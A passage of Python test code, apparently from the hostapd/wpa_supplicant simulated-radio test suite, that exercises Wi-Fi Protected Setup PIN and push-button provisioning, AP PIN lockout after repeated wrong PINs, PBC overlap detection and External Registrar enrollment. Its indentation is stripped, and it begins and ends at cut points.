raise Exception("Unexpected encryption/key_mgmt configuration: pairwise=%s group=%s key_mgmt=%s" % (status['pairwise_cipher'], status['group_cipher'], status['key_mgmt']))
dev[0].request("SET wps_force_auth_types ")
dev[0].request("SET wps_force_encr_types ")
@remote_compatible
def test_ap_wps_conf_pin_v1(dev, apdev):
"""WPS PIN provisioning with configured WPS v1.0 AP"""
ssid = "test-wps-conf-pin-v1"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("SET wps_version_number 0x10")
hapd.request("WPS_PIN any " + pin)
found = False
for i in range(0, 10):
dev[0].scan(freq="2412")
if "[WPS-PIN]" in dev[0].request("SCAN_RESULTS"):
found = True
break
if not found:
hapd.request("SET wps_version_number 0x20")
raise Exception("WPS-PIN flag not seen in scan results")
dev[0].dump_monitor()
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
hapd.request("SET wps_version_number 0x20")
@remote_compatible
def test_ap_wps_conf_pin_2sta(dev, apdev):
"""Two stations trying to use WPS PIN at the same time"""
ssid = "test-wps-conf-pin2"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
pin = "12345670"
pin2 = "55554444"
hapd.request("WPS_PIN " + dev[0].get_status_field("uuid") + " " + pin)
hapd.request("WPS_PIN " + dev[1].get_status_field("uuid") + " " + pin)
dev[0].dump_monitor()
dev[1].dump_monitor()
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
dev[1].wait_connected(timeout=30)
@remote_compatible
def test_ap_wps_conf_pin_timeout(dev, apdev):
"""WPS PIN provisioning with configured AP timing out PIN"""
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
addr = dev[0].p2p_interface_addr()
pin = dev[0].wps_read_pin()
if "FAIL" not in hapd.request("WPS_PIN "):
raise Exception("Unexpected success on invalid WPS_PIN")
hapd.request("WPS_PIN any " + pin + " 1")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
time.sleep(1.1)
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = hapd.wait_event(["WPS-PIN-NEEDED"], timeout=20)
if ev is None:
raise Exception("WPS-PIN-NEEDED event timed out")
ev = dev[0].wait_event(["WPS-M2D"])
if ev is None:
raise Exception("M2D not reported")
dev[0].request("WPS_CANCEL")
hapd.request("WPS_PIN any " + pin + " 20 " + addr)
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=30)
def test_ap_wps_reg_connect(dev, apdev):
"""WPS registrar using AP PIN to connect"""
ssid = "test-wps-reg-ap-pin"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin})
logger.info("WPS provisioning step")
dev[0].dump_monitor()
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
def test_ap_wps_reg_connect_zero_len_ap_pin(dev, apdev):
"""hostapd with zero length ap_pin parameter"""
ssid = "test-wps-reg-ap-pin"
appin = ""
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin})
logger.info("WPS provisioning step")
dev[0].dump_monitor()
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin, no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("No WPS-FAIL reported")
if "msg=5 config_error=15" not in ev:
raise Exception("Unexpected WPS-FAIL: " + ev)
def test_ap_wps_reg_connect_mixed_mode(dev, apdev):
"""WPS registrar using AP PIN to connect (WPA+WPA2)"""
ssid = "test-wps-reg-ap-pin"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "3",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wpa_pairwise": "TKIP", "ap_pin": appin})
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
def test_ap_wps_reg_override_ap_settings(dev, apdev):
"""WPS registrar and ap_settings override"""
ap_settings = "/tmp/ap_wps_reg_override_ap_settings"
try:
os.remove(ap_settings)
except:
pass
# Override AP Settings with values that point to another AP
data = build_wsc_attr(ATTR_NETWORK_INDEX, b'\x01')
data += build_wsc_attr(ATTR_SSID, b"test")
data += build_wsc_attr(ATTR_AUTH_TYPE, b'\x00\x01')
data += build_wsc_attr(ATTR_ENCR_TYPE, b'\x00\x01')
data += build_wsc_attr(ATTR_NETWORK_KEY, b'')
data += build_wsc_attr(ATTR_MAC_ADDR, binascii.unhexlify(apdev[1]['bssid'].replace(':', '')))
with open(ap_settings, "wb") as f:
f.write(data)
ssid = "test-wps-reg-ap-pin"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin, "ap_settings": ap_settings })
hapd2 = hostapd.add_ap(apdev[1], { "ssid": "test" })
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].scan_for_bss(apdev[1]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
ev = hapd2.wait_event(['AP-STA-CONNECTED'], timeout=10)
os.remove(ap_settings)
if ev is None:
raise Exception("No connection with the other AP")
def check_wps_reg_failure(dev, ap, appin):
dev.request("WPS_REG " + ap['bssid'] + " " + appin)
ev = dev.wait_event(["WPS-SUCCESS", "WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS operation timed out")
if "WPS-SUCCESS" in ev:
raise Exception("WPS operation succeeded unexpectedly")
if "config_error=15" not in ev:
raise Exception("WPS setup locked state was not reported correctly")
def test_ap_wps_random_ap_pin(dev, apdev):
"""WPS registrar using random AP PIN"""
ssid = "test-wps-reg-random-ap-pin"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"uuid": ap_uuid, "upnp_iface": "lo" }
hapd = hostapd.add_ap(apdev[0], params)
appin = hapd.request("WPS_AP_PIN random")
if "FAIL" in appin:
raise Exception("Could not generate random AP PIN")
if appin not in hapd.request("WPS_AP_PIN get"):
raise Exception("Could not fetch current AP PIN")
logger.info("WPS provisioning step")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
hapd.request("WPS_AP_PIN disable")
logger.info("WPS provisioning step with AP PIN disabled")
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
check_wps_reg_failure(dev[1], apdev[0], appin)
logger.info("WPS provisioning step with AP PIN reset")
appin = "12345670"
hapd.request("WPS_AP_PIN set " + appin)
dev[1].wps_reg(apdev[0]['bssid'], appin)
dev[0].request("REMOVE_NETWORK all")
dev[1].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=10)
dev[1].wait_disconnected(timeout=10)
logger.info("WPS provisioning step after AP PIN timeout")
hapd.request("WPS_AP_PIN disable")
appin = hapd.request("WPS_AP_PIN random 1")
time.sleep(1.1)
if "FAIL" not in hapd.request("WPS_AP_PIN get"):
raise Exception("AP PIN unexpectedly still enabled")
check_wps_reg_failure(dev[0], apdev[0], appin)
logger.info("WPS provisioning step after AP PIN timeout(2)")
hapd.request("WPS_AP_PIN disable")
appin = "12345670"
hapd.request("WPS_AP_PIN set " + appin + " 1")
time.sleep(1.1)
if "FAIL" not in hapd.request("WPS_AP_PIN get"):
raise Exception("AP PIN unexpectedly still enabled")
check_wps_reg_failure(dev[1], apdev[0], appin)
with fail_test(hapd, 1, "os_get_random;wps_generate_pin"):
hapd.request("WPS_AP_PIN random 1")
hapd.request("WPS_AP_PIN disable")
with alloc_fail(hapd, 1, "upnp_wps_set_ap_pin"):
hapd.request("WPS_AP_PIN set 12345670")
hapd.request("WPS_AP_PIN disable")
if "FAIL" not in hapd.request("WPS_AP_PIN set"):
raise Exception("Invalid WPS_AP_PIN accepted")
if "FAIL" not in hapd.request("WPS_AP_PIN foo"):
raise Exception("Invalid WPS_AP_PIN accepted")
def test_ap_wps_reg_config(dev, apdev):
"""WPS registrar configuring an AP using AP PIN"""
ssid = "test-wps-init-ap-pin"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"ap_pin": appin})
logger.info("WPS configuration step")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
new_ssid = "wps-new-ssid"
new_passphrase = "1234567890"
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPA2PSK", "CCMP",
new_passphrase)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != new_ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
logger.info("Re-configure back to open")
dev[0].request("REMOVE_NETWORK all")
dev[0].flush_scan_cache()
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], appin, "wps-open", "OPEN", "NONE", "")
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != "wps-open":
raise Exception("Unexpected SSID")
if status['key_mgmt'] != 'NONE':
raise Exception("Unexpected key_mgmt")
def test_ap_wps_reg_config_ext_processing(dev, apdev):
"""WPS registrar configuring an AP with external config processing"""
ssid = "test-wps-init-ap-pin"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wps_cred_processing": "1", "ap_pin": appin}
hapd = hostapd.add_ap(apdev[0], params)
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
new_ssid = "wps-new-ssid"
new_passphrase = "1234567890"
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPA2PSK", "CCMP",
new_passphrase, no_wait=True)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS registrar operation timed out")
ev = hapd.wait_event(["WPS-NEW-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("WPS configuration timed out")
if "1026" not in ev:
raise Exception("AP Settings missing from event")
hapd.request("SET wps_cred_processing 0")
if "FAIL" in hapd.request("WPS_CONFIG " + binascii.hexlify(new_ssid.encode()).decode() + " WPA2PSK CCMP " + binascii.hexlify(new_passphrase.encode()).decode()):
raise Exception("WPS_CONFIG command failed")
dev[0].wait_connected(timeout=15)
def test_ap_wps_reg_config_tkip(dev, apdev):
"""WPS registrar configuring AP to use TKIP and AP upgrading to TKIP+CCMP"""
skip_with_fips(dev[0])
ssid = "test-wps-init-ap"
appin = "12345670"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"ap_pin": appin})
logger.info("WPS configuration step")
dev[0].request("SET wps_version_number 0x10")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].dump_monitor()
new_ssid = "wps-new-ssid-with-tkip"
new_passphrase = "1234567890"
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPAPSK", "TKIP",
new_passphrase)
logger.info("Re-connect to verify WPA2 mixed mode")
dev[0].request("DISCONNECT")
id = 0
dev[0].set_network(id, "pairwise", "CCMP")
dev[0].set_network(id, "proto", "RSN")
dev[0].connect_network(id)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected: wpa_state={} bssid={}".format(status['wpa_state'], status['bssid']))
if status['ssid'] != new_ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'TKIP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
def test_ap_wps_setup_locked(dev, apdev):
"""WPS registrar locking up AP setup on AP PIN failures"""
ssid = "test-wps-incorrect-ap-pin"
appin = "12345670"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin})
new_ssid = "wps-new-ssid-test"
new_passphrase = "1234567890"
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
ap_setup_locked=False
for pin in ["55554444", "1234", "12345678", "00000000", "11111111"]:
dev[0].dump_monitor()
logger.info("Try incorrect AP PIN - attempt " + pin)
dev[0].wps_reg(apdev[0]['bssid'], pin, new_ssid, "WPA2PSK",
"CCMP", new_passphrase, no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout on receiving WPS operation failure event")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
if "config_error=15" in ev:
logger.info("AP Setup Locked")
ap_setup_locked=True
elif "config_error=18" not in ev:
raise Exception("config_error=18 not reported")
dev[0].wait_disconnected(timeout=10)
time.sleep(0.1)
if not ap_setup_locked:
raise Exception("AP setup was not locked")
dev[0].request("WPS_CANCEL")
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412, force_scan=True,
only_new=True)
bss = dev[0].get_bss(apdev[0]['bssid'])
if 'wps_ap_setup_locked' not in bss or bss['wps_ap_setup_locked'] != '1':
logger.info("BSS: " + str(bss))
raise Exception("AP Setup Locked not indicated in scan results")
status = hapd.request("WPS_GET_STATUS")
if "Last WPS result: Failed" not in status:
raise Exception("WPS failure result not shown correctly")
if "Peer Address: " + dev[0].p2p_interface_addr() not in status:
raise Exception("Peer address not shown correctly")
time.sleep(0.5)
dev[0].dump_monitor()
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("WPS success was not reported")
dev[0].wait_connected(timeout=30)
appin = hapd.request("WPS_AP_PIN random")
if "FAIL" in appin:
raise Exception("Could not generate random AP PIN")
ev = hapd.wait_event(["WPS-AP-SETUP-UNLOCKED"], timeout=10)
if ev is None:
raise Exception("Failed to unlock AP PIN")
def test_ap_wps_setup_locked_timeout(dev, apdev):
"""WPS re-enabling AP PIN after timeout"""
ssid = "test-wps-incorrect-ap-pin"
appin = "12345670"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin})
new_ssid = "wps-new-ssid-test"
new_passphrase = "1234567890"
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
ap_setup_locked=False
for pin in ["55554444", "1234", "12345678", "00000000", "11111111"]:
dev[0].dump_monitor()
logger.info("Try incorrect AP PIN - attempt " + pin)
dev[0].wps_reg(apdev[0]['bssid'], pin, new_ssid, "WPA2PSK",
"CCMP", new_passphrase, no_wait=True)
ev = dev[0].wait_event(["WPS-FAIL", "CTRL-EVENT-CONNECTED"], timeout=15)
if ev is None:
raise Exception("Timeout on receiving WPS operation failure event")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
if "config_error=15" in ev:
logger.info("AP Setup Locked")
ap_setup_locked=True
break
elif "config_error=18" not in ev:
raise Exception("config_error=18 not reported")
dev[0].wait_disconnected(timeout=10)
time.sleep(0.1)
if not ap_setup_locked:
raise Exception("AP setup was not locked")
ev = hapd.wait_event(["WPS-AP-SETUP-UNLOCKED"], timeout=80)
if ev is None:
raise Exception("AP PIN did not get unlocked on 60 second timeout")
def test_ap_wps_setup_locked_2(dev, apdev):
"""WPS AP configured for special ap_setup_locked=2 mode"""
ssid = "test-wps-ap-pin"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin, "ap_setup_locked": "2" }
hapd = hostapd.add_ap(apdev[0], params)
new_ssid = "wps-new-ssid-test"
new_passphrase = "1234567890"
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], appin)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
hapd.dump_monitor()
dev[0].dump_monitor()
dev[0].wps_reg(apdev[0]['bssid'], appin, new_ssid, "WPA2PSK",
"CCMP", new_passphrase, no_wait=True)
ev = hapd.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("hostapd did not report WPS failure")
if "msg=12 config_error=15" not in ev:
raise Exception("Unexpected failure reason (AP): " + ev)
ev = dev[0].wait_event(["WPS-FAIL", "CTRL-EVENT-CONNECTED"])
if ev is None:
raise Exception("Timeout on receiving WPS operation failure event")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected connection")
if "config_error=15" not in ev:
raise Exception("Unexpected failure reason (STA): " + ev)
dev[0].request("WPS_CANCEL")
dev[0].wait_disconnected()
@remote_compatible
def test_ap_wps_pbc_overlap_2ap(dev, apdev):
"""WPS PBC session overlap with two active APs"""
params = { "ssid": "wps1", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1"}
hapd = hostapd.add_ap(apdev[0], params)
params = { "ssid": "wps2", "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "123456789", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_independent": "1"}
hapd2 = hostapd.add_ap(apdev[1], params)
hapd.request("WPS_PBC")
hapd2.request("WPS_PBC")
logger.info("WPS provisioning step")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412", force_scan=True)
dev[0].scan_for_bss(apdev[1]['bssid'], freq="2412")
dev[0].request("WPS_PBC")
ev = dev[0].wait_event(["WPS-OVERLAP-DETECTED"], timeout=15)
if ev is None:
raise Exception("PBC session overlap not detected")
hapd.request("DISABLE")
hapd2.request("DISABLE")
dev[0].flush_scan_cache()
@remote_compatible
def test_ap_wps_pbc_overlap_2sta(dev, apdev):
"""WPS PBC session overlap with two active STAs"""
ssid = "test-wps-pbc-overlap"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
logger.info("WPS provisioning step")
hapd.request("WPS_PBC")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[1].dump_monitor()
dev[0].request("WPS_PBC " + apdev[0]['bssid'])
dev[1].request("WPS_PBC " + apdev[0]['bssid'])
ev = dev[0].wait_event(["WPS-M2D"], timeout=15)
if ev is None:
raise Exception("PBC session overlap not detected (dev0)")
if "config_error=12" not in ev:
raise Exception("PBC session overlap not correctly reported (dev0)")
dev[0].request("WPS_CANCEL")
dev[0].request("DISCONNECT")
ev = dev[1].wait_event(["WPS-M2D"], timeout=15)
if ev is None:
raise Exception("PBC session overlap not detected (dev1)")
if "config_error=12" not in ev:
raise Exception("PBC session overlap not correctly reported (dev1)")
dev[1].request("WPS_CANCEL")
dev[1].request("DISCONNECT")
hapd.request("WPS_CANCEL")
ret = hapd.request("WPS_PBC")
if "FAIL" not in ret:
raise Exception("PBC mode allowed to be started while PBC overlap still active")
hapd.request("DISABLE")
dev[0].flush_scan_cache()
dev[1].flush_scan_cache()
@remote_compatible
def test_ap_wps_cancel(dev, apdev):
"""WPS AP cancelling enabled config method"""
ssid = "test-wps-ap-cancel"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP" })
bssid = apdev[0]['bssid']
logger.info("Verify PBC enable/cancel")
hapd.request("WPS_PBC")
dev[0].scan(freq="2412")
dev[0].scan(freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-PBC]" not in bss['flags']:
raise Exception("WPS-PBC flag missing")
if "FAIL" in hapd.request("WPS_CANCEL"):
raise Exception("WPS_CANCEL failed")
dev[0].scan(freq="2412")
dev[0].scan(freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-PBC]" in bss['flags']:
raise Exception("WPS-PBC flag not cleared")
logger.info("Verify PIN enable/cancel")
hapd.request("WPS_PIN any 12345670")
dev[0].scan(freq="2412")
dev[0].scan(freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
raise Exception("WPS-AUTH flag missing")
if "FAIL" in hapd.request("WPS_CANCEL"):
raise Exception("WPS_CANCEL failed")
dev[0].scan(freq="2412")
dev[0].scan(freq="2412")
bss = dev[0].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not cleared")
def test_ap_wps_er_add_enrollee(dev, apdev):
"""WPS ER configuring AP and adding a new enrollee using PIN"""
try:
_test_ap_wps_er_add_enrollee(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_add_enrollee(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"device_name": "Wireless AP", "manufacturer": "Company",
"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
'friendly_name': "WPS AP - <>&'\" - TEST",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"})
logger.info("WPS configuration step")
new_passphrase = "1234567890"
dev[0].dump_monitor()
dev[0].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[0].wps_reg(apdev[0]['bssid'], ap_pin, ssid, "WPA2PSK", "CCMP",
new_passphrase)
status = dev[0].get_status()
if status['wpa_state'] != 'COMPLETED' or status['bssid'] != apdev[0]['bssid']:
raise Exception("Not fully connected")
if status['ssid'] != ssid:
raise Exception("Unexpected SSID")
if status['pairwise_cipher'] != 'CCMP' or status['group_cipher'] != 'CCMP':
raise Exception("Unexpected encryption configuration")
if status['key_mgmt'] != 'WPA2-PSK':
raise Exception("Unexpected key_mgmt")
logger.info("Start ER")
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
if "|WPS AP - <>&'" - TEST|Company|" not in ev:
raise Exception("Expected friendly name not found")
logger.info("Learn AP configuration through UPnP")
dev[0].dump_monitor()
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not in settings")
if "ssid=" + ssid not in ev:
raise Exception("Expected SSID not in settings")
if "key=" + new_passphrase not in ev:
raise Exception("Expected passphrase not in settings")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
logger.info("Add Enrollee using ER")
pin = dev[1].wps_read_pin()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin + " " + dev[1].p2p_interface_addr())
dev[1].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[1].dump_monitor()
dev[1].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("Enrollee did not report success")
dev[1].wait_connected(timeout=15)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
hwsim_utils.test_connectivity_sta(dev[0], dev[1])
logger.info("Add a specific Enrollee using ER")
pin = dev[2].wps_read_pin()
addr2 = dev[2].p2p_interface_addr()
dev[0].dump_monitor()
dev[2].scan_for_bss(apdev[0]['bssid'], freq=2412)
dev[2].dump_monitor()
dev[2].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
ev = dev[0].wait_event(["WPS-ER-ENROLLEE-ADD"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
if addr2 not in ev:
raise Exception("Unexpected Enrollee MAC address")
dev[0].request("WPS_ER_PIN " + addr2 + " " + pin + " " + addr2)
dev[2].wait_connected(timeout=30)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
logger.info("Verify registrar selection behavior")
dev[0].request("WPS_ER_PIN any " + pin + " " + dev[1].p2p_interface_addr())
dev[1].request("DISCONNECT")
dev[1].wait_disconnected(timeout=10)
dev[1].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[1].scan(freq="2412")
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
# It is possible for scan to miss an update especially when running
# tests under load with multiple VMs, so allow another attempt.
dev[1].scan(freq="2412")
bss = dev[1].get_bss(apdev[0]['bssid'])
if "[WPS-AUTH]" not in bss['flags']:
raise Exception("WPS-AUTH flag missing")
logger.info("Stop ER")
dev[0].dump_monitor()
dev[0].request("WPS_ER_STOP")
ev = dev[0].wait_event(["WPS-ER-AP-REMOVE"])
if ev is None:
raise Exception("WPS ER unsubscription timed out")
# It takes some time for the UPnP UNSUBSCRIBE command to go through, so wait
# a bit before verifying that the scan results have changed.
time.sleep(0.2)
for i in range(0, 10):
dev[1].request("BSS_FLUSH 0")
dev[1].scan(freq="2412", only_new=True)
bss = dev[1].get_bss(apdev[0]['bssid'])
if bss and 'flags' in bss and "[WPS-AUTH]" not in bss['flags']:
break
logger.debug("WPS-AUTH flag was still in place - wait a bit longer")
time.sleep(0.1)
if "[WPS-AUTH]" in bss['flags']:
raise Exception("WPS-AUTH flag not removed")
def test_ap_wps_er_add_enrollee_uuid(dev, apdev):
"""WPS ER adding a new enrollee identified by UUID"""
try:
_test_ap_wps_er_add_enrollee_uuid(dev, apdev)
finally:
dev[0].request("WPS_ER_STOP")
def _test_ap_wps_er_add_enrollee_uuid(dev, apdev):
ssid = "wps-er-add-enrollee"
ap_pin = "12345670"
ap_uuid = "27ea801a-9e5c-4e73-bd82-f89cbcd10d7e"
hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
